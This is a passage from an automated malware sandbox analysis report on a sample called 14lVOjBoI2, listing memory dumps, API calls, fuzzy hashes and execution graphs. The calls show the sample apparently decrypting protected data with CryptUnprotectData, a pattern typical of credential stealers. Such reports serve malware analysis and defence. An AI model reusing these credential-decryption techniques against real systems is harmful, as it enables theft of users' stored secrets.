                                                                                                          • Source File: 00000000.00000002.2128913504.0000000010001000.00000020.00000001.01000000.00000004.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2128848115.0000000010000000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2128967473.0000000010003000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2129045974.0000000010005000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_10000000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Global$Free$Alloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1780285237-0
                                                                                                          • Opcode ID: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                          • Instruction ID: f345eba8489605592ce73ef35c78e6b42925bf5f5eceaf1f60f0973e38c56604
                                                                                                          • Opcode Fuzzy Hash: 9cbcb91a2cf1141c01d88779e182a67407fb9f9860b92084c2da8ef292891df1
                                                                                                          • Instruction Fuzzy Hash: AE318FF6904211DBF314CF64DC859EA77E8EB853D0B12452AFB45E726CEB34E8018765
                                                                                                          APIs
                                                                                                          • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405B9F
                                                                                                          • lstrcmpiA.KERNEL32(00000000,00000000), ref: 00405BB7
                                                                                                          • CharNextA.USER32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BC8
                                                                                                          • lstrlenA.KERNEL32(00000000,?,00000000,00405E70,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405BD1
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000000.00000002.2118868010.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                          • Associated: 00000000.00000002.2118853247.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2118883252.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.0000000000437000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000043F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119162564.000000000045B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                          • Associated: 00000000.00000002.2119249308.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_0_2_400000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: lstrlen$CharNextlstrcmpi
                                                                                                          • String ID:
                                                                                                          • API String ID: 190613189-0
                                                                                                          • Opcode ID: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                          • Instruction ID: ee410971918da6c20df7c5ac797640abd601cb5b02c8e88895b13af08820b85c
                                                                                                          • Opcode Fuzzy Hash: c22d3165051237620b2fbf365f01d50e367ccce7d83d9982a11a9c9d857fbe9e
                                                                                                          • Instruction Fuzzy Hash: 22F06231104958AFC7029BA5DD4099FBBB8EF55254B2540A9E840F7211D674FE019BA9

                                                                                                          Execution Graph

                                                                                                          Execution Coverage:10.3%
                                                                                                          Dynamic/Decrypted Code Coverage:100%
                                                                                                          Signature Coverage:1.7%
                                                                                                          Total number of Nodes:347
                                                                                                          Total number of Limit Nodes:24
                                                                                                          execution_graph 41333 38dccc38 41334 38dccc54 41333->41334 41337 38dc9434 41334->41337 41336 38dccc73 41338 38dc943f 41337->41338 41339 38dccd27 41338->41339 41342 38dccd40 41338->41342 41346 38dccd30 41338->41346 41339->41336 41343 38dccd57 41342->41343 41344 38dccdf9 41343->41344 41350 38dc9568 41343->41350 41344->41344 41349 38dccd3f 41346->41349 41347 38dccdf9 41347->41347 41348 38dc9568 2 API calls 41348->41347 41349->41347 41349->41348 41351 38dc9573 41350->41351 41353 38dcea1f 41351->41353 41354 38dce5b8 41351->41354 41353->41344 41356 38dce5c3 41354->41356 41355 38dceae9 41355->41353 41356->41355 41359 38dcf890 41356->41359 41363 38dcf880 41356->41363 41360 38dcf8bb 41359->41360 41361 38dcf96a 41360->41361 41367 38d7fea8 41360->41367 41361->41361 41365 38dcf890 41363->41365 41364 38dcf96a 41364->41364 41365->41364 41366 38d7fea8 2 API calls 41365->41366 41366->41364 41371 392c0006 41367->41371 41375 392c0040 41367->41375 41372 392c00a8 CreateWindowExW 41371->41372 41374 392c0164 41372->41374 41376 392c00a8 CreateWindowExW 41375->41376 41378 392c0164 41376->41378 41379 11b158 41380 11b174 41379->41380 41388 38d70160 41380->41388 41393 38d70198 41380->41393 41397 38d70188 41380->41397 41381 11b1a3 41401 392c2660 41381->41401 41407 392c2651 41381->41407 41389 38d7016c 41388->41389 41390 38d701a4 41388->41390 41389->41381 41413 38d7c638 41390->41413 41392 38d701da 41392->41381 41394 38d701a4 41393->41394 41396 38d7c638 CryptUnprotectData 41394->41396 41395 38d701da 41395->41381 41396->41395 41398 38d7018c 41397->41398 41399 38d701da 41398->41399 41400 38d7c638 CryptUnprotectData 41398->41400 41399->41381 41400->41399 41402 392c266f 41401->41402 41445 392c0860 41402->41445 41408 392c266f 41407->41408 41409 392c0860 14 API calls 41408->41409 41410 392c2676 41409->41410 41411 392c1e4c 18 API calls 41410->41411 41412 11b1b1 41411->41412 41415 38d7c631 41413->41415 41414 38d7caf9 41414->41392 41415->41413 41415->41414 41417 38d7cf01 41415->41417 41418 38d7cf10 41417->41418 41422 38d7d550 41418->41422 41430 38d7d540 41418->41430 41419 38d7cf80 41419->41415 41423 38d7d575 41422->41423 41426 38d7d629 41422->41426 41423->41426 41427 38d7d550 CryptUnprotectData 41423->41427 41428 38d7d540 CryptUnprotectData 41423->41428 41438 38d7d730 41423->41438 41442 38d7d1ec 41426->41442 41427->41426 41428->41426 41431 38d7d550 41430->41431 41432 38d7d629 41431->41432 41435 38d7d550 CryptUnprotectData 41431->41435 41436 38d7d540 CryptUnprotectData 41431->41436 41437 38d7d730 CryptUnprotectData 41431->41437 41433 38d7d1ec CryptUnprotectData 41432->41433 41434 38d7d7f5 41433->41434 41434->41419 41435->41432 41436->41432 41437->41432 41439 38d7d745 41438->41439 41440 38d7d1ec CryptUnprotectData 41439->41440 41441 38d7d7f5 41440->41441 41441->41426 41443 38d7d9e0 CryptUnprotectData 41442->41443 41444 38d7d7f5 41443->41444 41444->41419 41446 392c0870 41445->41446 41447 392c088d 41446->41447 41455 392c08a8 41446->41455 41467 392c0851 41446->41467 41479 392c0898 41446->41479 41451 392c1e4c 41447->41451 41453 392c1e57 41451->41453 41454 392c2796 41453->41454 41502 392c1ef4 41453->41502 41456 392c08ee GetCurrentProcess 41455->41456 41458 392c0939 41456->41458 41459 392c0940 GetCurrentThread 41456->41459 41458->41459 41460 392c097d GetCurrentProcess 41459->41460 41461 392c0976 41459->41461 41462 392c09b3 41460->41462 41461->41460 41491 392c0e58 41462->41491 41493 392c0a77 41462->41493 41463 392c09db GetCurrentThreadId 41464 392c0a0c 41463->41464 41464->41447 41468 392c085a GetCurrentProcess 41467->41468 41470 392c0939 41468->41470 41471 392c0940 GetCurrentThread 41468->41471 41470->41471 41472 392c097d GetCurrentProcess 41471->41472 41473 392c0976 41471->41473 41474 392c09b3 41472->41474 41473->41472 41477 392c0e58 41474->41477 41478 392c0a77 2 API calls 41474->41478 41475 392c09db GetCurrentThreadId 41476 392c0a0c 41475->41476 41476->41447 41477->41475 41478->41475 41480 392c08a2 GetCurrentProcess 41479->41480 41482 392c0939 41480->41482 41483 392c0940 GetCurrentThread 41480->41483 41482->41483 41484 392c097d GetCurrentProcess 41483->41484 41486 392c0976 41483->41486 41485 392c09b3 41484->41485 41489 392c0e58 41485->41489 41490 392c0a77 2 API calls 41485->41490 41486->41484 41487 392c09db GetCurrentThreadId 41488 392c0a0c 41487->41488 41488->41447 41489->41487 41490->41487 41492 392c0e76 41491->41492 41492->41463 41497 392c0ae9 41493->41497 41500 392c0af0 DuplicateHandle 41493->41500 41494 392c0ab6 41494->41463 41498 392c0af0 DuplicateHandle 41497->41498 41499 392c0b86 41498->41499 41499->41494 41501 392c0b86 41500->41501 41501->41494 41504 392c1eff 41502->41504 41503 392c2e04 41503->41453 41504->41503 41505 392c2da9 41504->41505 41513 392c3d68 41504->41513 41506 392c2dd9 41505->41506 41507 392c2998 15 API calls 41505->41507 41506->41503 41519 392c2998 41506->41519 41507->41506 41509 392c2df1 41509->41503 41525 392cd448 41509->41525 41531 392cd438 41509->41531 41514 392c3d89 41513->41514 41515 392c3dad 41514->41515 41537 392c3f18 41514->41537 41543 392c3f70 41514->41543 41550 392c3f07 41514->41550 41515->41505 41520 392c29a3 41519->41520 41521 392ccee1 41520->41521 41522 392c0860 14 API calls 41520->41522 41521->41509 41523 392ccefb 41522->41523 41619 392cc3f4 41523->41619 41527 392cd4ad 41525->41527 41526 392cd4fa 41526->41503 41527->41526 41528 392cd6d9 41527->41528 41626 392cc4bc 41527->41626 41529 392c0860 14 API calls 41528->41529 41529->41526 41536 392cd4ad 41531->41536 41532 392cd6d9 41533 392c0860 14 API calls 41532->41533 41534 392cd4fa 41533->41534 41534->41503 41535 392cc4bc DispatchMessageW 41535->41536 41536->41532 41536->41534 41536->41535 41538 392c3f25 41537->41538 41539 392c0860 14 API calls 41538->41539 41540 392c3f53 41539->41540 41541 392c3f5e 41540->41541 41556 392c2ac4 41540->41556 41541->41515 41544 392c3f7b 41543->41544 41545 392c3f54 41543->41545 41548 392c2af8 16 API calls 41544->41548 41549 392c3fd0 41544->41549 41546 392c3f5e 41545->41546 41547 392c2ac4 16 API calls 41545->41547 41546->41515 41547->41546 41548->41549 41549->41549 41553 392c3f25 41550->41553 41551 392c0860 14 API calls 41552 392c3f53 41551->41552 41554 392c3f5e 41552->41554 41555 392c2ac4 16 API calls 41552->41555 41553->41551 41554->41515 41555->41554 41557 392c2acf 41556->41557 41559 392c3fd0 41557->41559 41560 392c2af8 41557->41560 41559->41559 41561 392c2b03 41560->41561 41573 392c2b08 41561->41573 41563 392c403f 41577 392c2b28 41563->41577 41565 392c4068 41582 392c2b38 41565->41582 41567 392c406f 41586 392c88f8 41567->41586 41594 392c9040 41567->41594 41602 392c91b0 41567->41602 41609 392c91c8 41567->41609 41568 392c4079 41568->41559 41576 392c2b13 41573->41576 41574 392c5468 41574->41563 41575 392c3d68 16 API calls 41575->41574 41576->41574 41576->41575 41579 392c2b33 41577->41579 41581 392c85a8 41579->41581 41615 392c73c0 41579->41615 41580 392c85a3 41580->41565 41581->41565 41583 392c2b43 41582->41583 41584 392c88f8 2 API calls 41583->41584 41585 392c8ff7 41584->41585 41585->41567 41591 392c8903 41586->41591 41587 392c91a0 41587->41568 41588 392c9205 41588->41568 41589 392c91ba 41589->41588 41592 38dcf890 2 API calls 41589->41592 41593 38dcf880 2 API calls 41589->41593 41590 392c88f8 CreateWindowExW CreateWindowExW 41590->41591 41591->41587 41591->41589 41591->41590 41592->41588 41593->41588 41597 392c9050 41594->41597 41595 392c91a0 41595->41568 41596 392c88f8 CreateWindowExW CreateWindowExW 41596->41597 41597->41595 41597->41596 41598 392c91ba 41597->41598 41599 392c9205 41598->41599 41600 38dcf890 2 API calls 41598->41600 41601 38dcf880 2 API calls 41598->41601 41599->41568 41600->41599 41601->41599 41604 392c9135 41602->41604 41605 392c91ba 41602->41605 41603 392c88f8 CreateWindowExW CreateWindowExW 41603->41604 41604->41602 41604->41603 41606 392c9205 41605->41606 41607 38dcf890 2 API calls 41605->41607 41608 38dcf880 2 API calls 41605->41608 41606->41568 41607->41606 41608->41606 41611 392c92f9 41609->41611 41612 392c91f9 41609->41612 41610 392c9205 41610->41568 41611->41568 41612->41610 41613 38dcf890 2 API calls 41612->41613 41614 38dcf880 2 API calls 41612->41614 41613->41611 41614->41611 41617 392c73cb 41615->41617 41616 392c8725 41616->41580 41617->41616 41618 392c2b38 2 API calls 41617->41618 41618->41616 41620 392cc3ff 41619->41620 41622 392cd1fb 41620->41622 41623 392cc410 41620->41623 41622->41521 41624 392cd230 OleInitialize 41623->41624 41625 392cd294 41624->41625 41625->41622 41627 392ce508 DispatchMessageW 41626->41627 41628 392ce574 41627->41628 41628->41527 41629 ad030 41630 ad048 41629->41630 41631 ad0a2 41630->41631 41637 392c01e8 41630->41637 41642 392c0320 41630->41642 41646 392c16d0 41630->41646 41655 392c1700 41630->41655 41664 392c01f8 41630->41664 41638 392c021e 41637->41638 41640 392c1700 2 API calls 41638->41640 41641 392c16d0 2 API calls 41638->41641 41639 392c023f 41639->41631 41640->41639 41641->41639 41643 392c0325 41642->41643 41644 392c0337 41643->41644 41669 392c0767 41643->41669 41644->41631 41647 392c1700 41646->41647 41648 392c175f 41647->41648 41672 392c1878 41647->41672 41678 392c9ad0 41647->41678 41684 392c9be4 41647->41684 41690 392c9b18 41647->41690 41695 392c9b08 41647->41695 41701 392c1888 41647->41701 41656 392c172d 41655->41656 41657 392c175f 41656->41657 41658 392c1878 2 API calls 41656->41658 41659 392c1888 2 API calls 41656->41659 41660 392c9b08 2 API calls 41656->41660 41661 392c9b18 2 API calls 41656->41661 41662 392c9be4 2 API calls 41656->41662 41663 392c9ad0 2 API calls 41656->41663 41658->41657 41659->41657 41660->41657 41661->41657 41662->41657 41663->41657 41665 392c021e 41664->41665 41667 392c1700 2 API calls 41665->41667 41668 392c16d0 2 API calls 41665->41668 41666 392c023f 41666->41631 41667->41666 41668->41666 41670 392c077e 41669->41670 41671 392c0860 14 API calls 41669->41671 41670->41644 41671->41670 41673 392c1888 41672->41673 41675 392c189e 41673->41675 41707 392c18e0 41673->41707 41711 392c18f0 41673->41711 41674 392c18dc 41674->41648 41675->41648 41679 392c9ae0 41678->41679 41681 392c9b18 41678->41681 41679->41648 41680 392c9bb8 41680->41648 41715 392c9bbf 41681->41715 41720 392c9bd0 41681->41720 41685 392c9ba2 41684->41685 41686 392c9bf2 41684->41686 41688 392c9bbf 2 API calls 41685->41688 41689 392c9bd0 2 API calls 41685->41689 41687 392c9bb8 41687->41648 41688->41687 41689->41687 41692 392c9b2c 41690->41692 41691 392c9bb8 41691->41648 41693 392c9bbf 2 API calls 41692->41693 41694 392c9bd0 2 API calls 41692->41694 41693->41691 41694->41691 41696 392c9abb 41695->41696 41698 392c9b12 41695->41698 41696->41648 41697 392c9bb8 41697->41648 41699 392c9bbf 2 API calls 41698->41699 41700 392c9bd0 2 API calls 41698->41700 41699->41697 41700->41697 41702 392c1896 41701->41702 41704 392c189e 41702->41704 41705 392c18e0 CallWindowProcW 41702->41705 41706 392c18f0 CallWindowProcW 41702->41706 41703 392c18dc 41703->41648 41704->41648 41705->41703 41706->41703 41708 392c18f0 41707->41708 41709 392c198a CallWindowProcW 41708->41709 41710 392c1939 41708->41710 41709->41710 41710->41674 41712 392c1939 41711->41712 41713 392c1932 41711->41713 41712->41674 41713->41712 41714 392c198a CallWindowProcW 41713->41714 41714->41712 41716 392c9bcd 41715->41716 41717 392c9be1 41716->41717 41724 392cad48 41716->41724 41731 392cad91 41716->41731 41717->41680 41721 392c9be1 41720->41721 41722 392cad48 2 API calls 41720->41722 41723 392cad91 2 API calls 41720->41723 41721->41680 41722->41721 41723->41721 41725 392cad98 41724->41725 41726 392cad60 41724->41726 41728 392cadd8 41725->41728 41729 392c18e0 CallWindowProcW 41725->41729 41730 392c18f0 CallWindowProcW 41725->41730 41726->41717 41727 392cadaa 41727->41717 41728->41717 41729->41727 41730->41727 41732 392cad98 41731->41732 41734 392cadd8 41732->41734 41735 392c18e0 CallWindowProcW 41732->41735 41736 392c18f0 CallWindowProcW 41732->41736 41733 392cadaa 41733->41717 41734->41717 41735->41733 41736->41733 41737 392c1b50 SetTimer 41738 392c1bbc 41737->41738 41739 392c1bf0 41741 392c1c1d 41739->41741 41740 392c1c6c 41740->41740 41741->41740 41744 392c1db8 41741->41744 41749 392c1da9 41741->41749 41745 392c1dcc 41744->41745 41748 38dc9568 2 API calls 41745->41748 41754 38dce9f8 41745->41754 41746 392c1dd5 41746->41740 41748->41746 41750 392c1dcc 41749->41750 41752 38dce9f8 2 API calls 41750->41752 41753 38dc9568 2 API calls 41750->41753 41751 392c1dd5 41751->41740 41752->41751 41753->41751 41756 38dce9fe 41754->41756 41759 38dcea68 41754->41759 41755 38dceae9 41755->41746 41757 38dce5b8 2 API calls 41756->41757 41758 38dcea1f 41756->41758 41757->41758 41758->41746 41759->41755 41760 38dcf890 2 API calls 41759->41760 41761 38dcf880 2 API calls 41759->41761 41760->41755 41761->41755

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 188 114328-114368 190 11436a 188->190 191 11436f-11444c call 113168 call 112c88 188->191 190->191 201 114453-114471 191->201 202 11444e 191->202 232 114474 call 114620 201->232 233 114474 call 114664 201->233 202->201 203 11447a-114485 204 114487 203->204 205 11448c-114490 203->205 204->205 206 114492-114493 205->206 207 114495-11449c 205->207 208 1144b4-1144f8 206->208 209 1144a3-1144b1 207->209 210 11449e 207->210 214 11455e-114575 208->214 209->208 210->209 216 114577-11459c 214->216 217 1144fa-114510 214->217 223 1145b4 216->223 224 11459e-1145b3 216->224 221 114512-11451e 217->221 222 11453a 217->222 225 114520-114526 221->225 226 114528-11452e 221->226 227 114540-11455d 222->227 224->223 228 114538 225->228 226->228 227->214 228->227 232->203 233->203
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643138161.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_110000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: 0o#p$Lj#p$Lj#p
                                                                                                          • API String ID: 0-1178635779
                                                                                                          • Opcode ID: c6f462a4bd88b64a7c7d66a374412a55205266d41798668af1b98fe8dfa017a9
                                                                                                          • Instruction ID: 35a673669e6ac638ed4e91f890d72ca5529ef4d930766d3559dfcb8bc03a1ba1
                                                                                                          • Opcode Fuzzy Hash: c6f462a4bd88b64a7c7d66a374412a55205266d41798668af1b98fe8dfa017a9
                                                                                                          • Instruction Fuzzy Hash: F491B374E00258DFEB58CFA9D884ADDBBF2BF89300F158069E419AB365DB349981CF50
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643138161.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_110000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: $
                                                                                                          • API String ID: 0-3993045852
                                                                                                          • Opcode ID: 85229d0f9bc521d3b9bd26384755452da3513b14561427c65e112e3c62830649
                                                                                                          • Instruction ID: ca422c7da3e934b411e38e65635a911323dbbfec3f19f80636a2bd2f18342cc8
                                                                                                          • Opcode Fuzzy Hash: 85229d0f9bc521d3b9bd26384755452da3513b14561427c65e112e3c62830649
                                                                                                          • Instruction Fuzzy Hash: 33A27E70A04209DFCB19CF68D8A4AEEBBF2BF88310F158569E415DB2A1D731ED85CB51

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1867 38d7d9d9-38d7d9de 1868 38d7d9e0-38d7da52 CryptUnprotectData 1867->1868 1869 38d7da54-38d7da5a 1868->1869 1870 38d7da5b-38d7da83 1868->1870 1869->1870
                                                                                                          APIs
                                                                                                          • CryptUnprotectData.CRYPT32(00000030,?,00000000,?,?,?,?), ref: 38D7DA45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CryptDataUnprotect
                                                                                                          • String ID:
                                                                                                          • API String ID: 834300711-0
                                                                                                          • Opcode ID: f98f445920066b06804b4aa7ab59018400251962776f09991f1485fba70ee4ac
                                                                                                          • Instruction ID: db90cbaa6088b46415d7c9d2ae4c11ad15f9b9de5cbf39754814a2a2839f31bf
                                                                                                          • Opcode Fuzzy Hash: f98f445920066b06804b4aa7ab59018400251962776f09991f1485fba70ee4ac
                                                                                                          • Instruction Fuzzy Hash: 521167B6804249DFDB10CF9AC841BDEBFF5EF48320F108429E954A7610C379A590CFA1

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 1873 38d7d1ec-38d7da52 CryptUnprotectData 1875 38d7da54-38d7da5a 1873->1875 1876 38d7da5b-38d7da83 1873->1876 1875->1876
                                                                                                          APIs
                                                                                                          • CryptUnprotectData.CRYPT32(00000030,?,00000000,?,?,?,?), ref: 38D7DA45
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CryptDataUnprotect
                                                                                                          • String ID:
                                                                                                          • API String ID: 834300711-0
                                                                                                          • Opcode ID: 9be94264b74f4800400112b73ecbd74e5d33e3c50f674b700942a642f089f6f2
                                                                                                          • Instruction ID: ff42ab74c49d7fba1748b52b401e0eb5c0cdad0ad539896bb49eec713ef8e891
                                                                                                          • Opcode Fuzzy Hash: 9be94264b74f4800400112b73ecbd74e5d33e3c50f674b700942a642f089f6f2
                                                                                                          • Instruction Fuzzy Hash: C3115676804349DFDB10CF9AC805BDEBBF4EF48360F108429E958A7210C379A950CFA1
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: y8
                                                                                                          • API String ID: 0-3143093990
                                                                                                          • Opcode ID: 89964aae563f4d0854ada373a725ce09e7e8c76df1fbc21ea2c8face76f4874c
                                                                                                          • Instruction ID: 425c8d3053bdf12c03e44072868f9213e1ab350d994bb84081e8212be6a68984
                                                                                                          • Opcode Fuzzy Hash: 89964aae563f4d0854ada373a725ce09e7e8c76df1fbc21ea2c8face76f4874c
                                                                                                          • Instruction Fuzzy Hash: CAA12574900308CFEB14DFA9D884BDDBBB1BF89310F20826AE448AB291DB749985CF55
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID: y8
                                                                                                          • API String ID: 0-3143093990
                                                                                                          • Opcode ID: 8f8ee9028ad0689ddf003a98144583d20032cd553c56e7eef6fbff092e347065
                                                                                                          • Instruction ID: 6dc5f6b1e963f3d99bd99c0fae842c1905cc83b8d4828cd82e64a7aca6f607c1
                                                                                                          • Opcode Fuzzy Hash: 8f8ee9028ad0689ddf003a98144583d20032cd553c56e7eef6fbff092e347065
                                                                                                          • Instruction Fuzzy Hash: 2CA1F474D00308CFEB14DFA9D984BDDBBB1BF89314F208269E448A72A1DB749985CF55
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672809134.00000000392C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 392C0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_392c0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 502fe847a0326204be624d66353e538206102257b2a65862df8e473820313dc7
                                                                                                          • Instruction ID: 5616453f8f97891193507841fc23adac6f2ddb6fd7a32e45cee41fe8eb1d4055
                                                                                                          • Opcode Fuzzy Hash: 502fe847a0326204be624d66353e538206102257b2a65862df8e473820313dc7
                                                                                                          • Instruction Fuzzy Hash: 9182A274A41228CFDB29DF64C895BD9BBB2FF89301F1081A9E40A67354DB359E82DF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8aec3ec86712c96bda17cf67e0594da153a117be13d682682e5072c6dc950f68
                                                                                                          • Instruction ID: 9916c6eb807367862ffdf5a50eccf12bc76e1565688a8826652db4dfde3d135e
                                                                                                          • Opcode Fuzzy Hash: 8aec3ec86712c96bda17cf67e0594da153a117be13d682682e5072c6dc950f68
                                                                                                          • Instruction Fuzzy Hash: B772B274A41218CFDB29DF64C895BD9BBB2FF89301F1081A9E50A67364CB359E82DF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672560105.0000000038DC0000.00000040.00000800.00020000.00000000.sdmp, Offset: 38DC0000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38dc0000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: e05694f6d392edb72c765dae086c63a466b9d8b66a4efc4fba0d6f86a08ca4ea
                                                                                                          • Instruction ID: 729d56d88e8ef4163c9a83339ceff01737217d4a75c105a3955a2e01dfefbe9e
                                                                                                          • Opcode Fuzzy Hash: e05694f6d392edb72c765dae086c63a466b9d8b66a4efc4fba0d6f86a08ca4ea
                                                                                                          • Instruction Fuzzy Hash: EB72CB74E01268CFEB64CF69C880BDDBBB2BB49341F5481EAD849A7251DB359E81CF50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643138161.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_110000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 8303d9bcd5b00f9f5fb648c607498c855f80bb399899ed9eb76e3b1c1b771bb0
                                                                                                          • Instruction ID: 7b66faf34dbcaad75bf11b2c0eb5f28191ac970b866b0f58b4023f08cc99c07e
                                                                                                          • Opcode Fuzzy Hash: 8303d9bcd5b00f9f5fb648c607498c855f80bb399899ed9eb76e3b1c1b771bb0
                                                                                                          • Instruction Fuzzy Hash: ED42093295E3A59FD7875B748CA41803BB1BF5B20539E08EAD8C18F467F2650E87CB25
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2643138161.0000000000110000.00000040.00000800.00020000.00000000.sdmp, Offset: 00110000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_110000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 27e99cb1c3b761ebc5db6df21b5740f2714dc809dcff4b48e983a0e3296b9686
                                                                                                          • Instruction ID: fc78af69b65bd104f79b467134afa6b275069d2ec51aa93bf8a728e1a93fd48f
                                                                                                          • Opcode Fuzzy Hash: 27e99cb1c3b761ebc5db6df21b5740f2714dc809dcff4b48e983a0e3296b9686
                                                                                                          • Instruction Fuzzy Hash: BA023030A00219DFCB18CFA9C984AEDBBF2FF98315F158069E815AB261D732DD81DB50
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000005.00000002.2672360659.0000000038D70000.00000040.00000800.00020000.00000000.sdmp, Offset: 38D70000, based on PE: false
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_5_2_38d70000_14lVOjBoI2.jbxd
                                                                                                          Similarity
                                                                                                          • API ID:
                                                                                                          • String ID:
                                                                                                          • API String ID:
                                                                                                          • Opcode ID: 0fde0aa6abe4b4b1ccfd5204127d0c9087712a0fab26624096efbc47653760d6
                                                                                                          • Instruction ID: 845fe3f9516f320cf70ee3c7f8d283e2cbffb1401886d634be9506133f2cf47c
                                                                                                          • Opcode Fuzzy Hash: 0fde0aa6abe4b4b1ccfd5204127d0c9087712a0fab26624096efbc47653760d6
